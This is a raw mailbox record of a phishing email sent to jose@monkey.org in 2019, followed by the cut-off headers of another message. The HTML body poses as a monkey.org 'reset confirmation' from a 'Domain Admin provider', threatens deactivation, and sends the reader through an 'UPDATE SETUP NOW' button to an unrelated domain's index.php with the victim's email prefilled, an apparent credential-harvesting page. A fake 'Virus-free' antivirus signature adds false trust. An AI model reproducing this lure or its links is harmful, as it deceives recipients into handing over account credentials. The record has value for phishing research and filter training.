From: monkey.org <befab@fabauthority.org>
To: jose@monkey.org
Subject: monkey.org RESET CONFIRMATION ACTIVATED!  |
Date: 25 Jun 2019 15:22:51 -0700
Message-ID: <20190625152251.526EA7AE38367A03@fabauthority.org>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - apa.dotblock.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - fabauthority.org
X-Get-Message-Sender-Via: apa.dotblock.com: authenticated_id: befab@fabauthority.org
X-Authenticated-Sender: apa.dotblock.com: befab@fabauthority.org
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 127

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19377"></HEAD>
<BODY>
<P style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(20,20,20); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; MARGIN-=
TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial"><FONT face=3D"verd=
ana, sans-serif">
<SPAN class=3Dm_7662477973772683161m_1816407754709306213gmail-m_43581451783=
53725540gmail-m_-5276232177603986674colour style=3D"COLOR: rgb(0,0,255)"><B=
><BR class=3DApple-interchange-newline>Dear&nbsp;</B></SPAN><SPAN style=3D"=
COLOR: rgb(0,0,255)">&nbsp;</SPAN><FONT style=3D"COLOR: rgb(0,0,255)" size=
=3D2><FONT size=3D2><B>jose</B></FONT>&nbsp;</FONT><B style=3D"COLOR: rgb(0=
,0,255)">&nbsp;,</B>&nbsp;<BR>&nbsp;&nbsp;</FONT></P>
<P style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(20,20,20); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; MARGIN-=
TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial"><FONT face=3D"cour=
ier new, monospace">Domain Admin provider<SPAN>
&nbsp;</SPAN><FONT color=3D#ff0000>(SQL)</FONT><SPAN>&nbsp;</SPAN>have sent=
 you several notice.</FONT></P>
<P style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(20,20,20); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; MARGIN-=
TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial"><FONT face=3D"cour=
ier new, monospace"><FONT size=3D2>
setup our latest security or&nbsp;<FONT color=3D#141414>You will be deactiv=
ated from using this service.&nbsp;</FONT></FONT><FONT color=3D#0000ff size=
=3D2>&nbsp;</FONT></FONT></P>
<P style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; MARGIN-=
TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial">
<A style=3D"COLOR: rgb(17,85,204)" href=3D"https://ardhsainikhousing.com/jk=
/update1/index.php?email=3Djose@monkey.org" target=3D_blank data-saferedire=
cturl=3D"https://www.google.com/url?q=3Dhttps://sosyenergy.com.mx/v/update1=
/index.php?email%3D%5B%5B-Email-%5D%5D&amp;source=3Dgmail&amp;ust=3D1561545=
036574000&amp;usg=3DAFQjCNH1dvczgx_r7wK-JR8qWHC7sxVUWQ"><B><FONT face=3D"co=
urier new, monospace">UPDATE SETUP NOW</FONT></B></A></P>
<P style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(20,20,20); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; MARGIN-=
TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial"></P>
<DIV style=3D"FONT-SIZE: small; FONT-FAMILY: Arial, Helvetica, sans-serif; =
WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: =
400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTE=
R-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-v=
ariant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style:=
 initial; text-decoration-color: initial">
<DIV>
<DIV><FONT face=3D"courier new, monospace"><B>Thanks.</B>&nbsp;</FONT></DIV=
></DIV>
<P><FONT face=3D"courier new, monospace"><B><FONT size=3D3>monkey.org</FONT=
><FONT size=3D2><SPAN class=3Dm_7662477973772683161m_1816407754709306213gma=
il-Apple-converted-space>&nbsp;</SPAN></FONT></B><STRONG><FONT size=3D+0>&n=
bsp;management<SPAN>&nbsp;</SPAN><FONT color=3D#ff0000>&copy;</FONT><SPAN>&=
nbsp;</SPAN><FONT color=3D#0000ff>2019</FONT><SPAN>&nbsp;</SPAN>All<SPAN>&n=
bsp;</SPAN><FONT color=3D#ff0000>rights</FONT><SPAN>&nbsp;</SPAN>reserved.<=
BR>&nbsp;</FONT></STRONG></FONT></P>
<TABLE style=3D"BORDER-TOP: rgb(211,212,222) 1px solid; FONT-FAMILY: arial,=
 sans-serif">
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; WIDTH: 55px; PADDING-TOP: 13px; MARGIN: 0px">
<A style=3D"COLOR: rgb(17,85,204)" href=3D"http://www.avg.com/email-signatu=
re?utm_medium=3Demail&amp;utm_source=3Dlink&amp;utm_campaign=3Dsig-email&am=
p;utm_content=3Demailclient" rel=3Dnoreferrer target=3D_blank data-saferedi=
recturl=3D"https://www.google.com/url?q=3Dhttp://www.avg.com/email-signatur=
e?utm_medium%3Demail%26utm_source%3Dlink%26utm_campaign%3Dsig-email%26utm_c=
ontent%3Demailclient&amp;source=3Dgmail&amp;ust=3D1561545036574000&amp;usg=
=3DAFQjCNFUib2SXiHc5PAOZCGcAWYG8CYV2A"><FONT face=3D"courier new, monospace=
">
<BR>&nbsp;</FONT></A></TD>
<TD style=3D"FONT-SIZE: 13px; FONT-FAMILY: Roboto, RobotoDraft, Helvetica, =
Arial, sans-serif; WIDTH: 470px; COLOR: rgb(65,66,78); PADDING-TOP: 12px; M=
ARGIN: 0px; LINE-HEIGHT: 18px"><FONT face=3D"courier new, monospace">
Virus-free.&nbsp;&nbsp;<A style=3D"COLOR: rgb(68,83,234)" href=3D"http://ww=
w.avg.com/email-signature?utm_medium=3Demail&amp;utm_source=3Dlink&amp;utm_=
campaign=3Dsig-email&amp;utm_content=3Demailclient" rel=3Dnoreferrer target=
=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttp://www=
=2Eavg.com/email-signature?utm_medium%3Demail%26utm_source%3Dlink%26utm_cam=
paign%3Dsig-email%26utm_content%3Demailclient&amp;source=3Dgmail&amp;ust=3D=
1561545036574000&amp;usg=3DAFQjCNFUib2SXiHc5PAOZCGcAWYG8CYV2A">
&nbsp;www.avg.com</A></FONT></TD></TR></TBODY></TABLE></DIV></BODY></HTML>

From jose@monkey.org Wed Jun 26 03:25:38 2019 +0000
Return-Path: bounces+11174680-badf-jose=monkey.org@sendgrid.net
Delivered-To: jose@monkey.org
X-FDA: 75641782356.19.group77_4e3cf44aa5546
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,bounces+11174680-badf-jose=monkey.org@sendgrid.net,:,RULES_HIT:4805:30026:30054:30070,0,RBL:149.72.183.131:@sendgrid.net:.lbl8.mailshell.net-62.18.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:21,LUA_SUMMARY:none
X-HE-Tag: group77_4e3cf44aa5546
X-Filterd-Recvd-Size: 30896
Received: from wrqvbtvp.outbound-mail.sendgrid.net (wrqvbtvp.outbound-mail.sendgrid.net [149.72.183.131])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 26 Jun 2019 03:25:37 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=sendgrid.net;
	h=from:subject:mime-version:to:content-type;
	s=smtpapi; bh=5VvnzQUYJ5qf0AZ2pK4vKa5dCJKv0Ug/6PtyGwBIh4s=;
	b=IzXnLKbbTYQgdmX9HAaAWJBw3sMlCh6QocxpGtnT18KdqnakR0qgTxwNhPpZKNdYTcbG
	/VXjHpJ/UnHq1Iq4UFHnNlgZElDASToLi5ymTjUBGtQ+SBFSE9isoXsqUrTsRIQpK57G3x
	hE+4P2N1C8dugztaPHzsQc8zjPZ5vNXqM=
Received: by filter0028p3las1.sendgrid.net with SMTP id filter0028p3las1-17354-5D12CCD7-A
        2019-06-26 01:39:35.444430148 +0000 UTC m=+14427.709785829
Received: from mail.com (unknown [40.85.250.48])
	by ismtpd0066p1mdw1.sendgrid.net (SG) with ESMTP id fSlMlLOVQa6gdXHL2YsleQ
	for <jose@monkey.org>; Wed, 26 Jun 2019 01:39:35.254 +0000 (UTC)
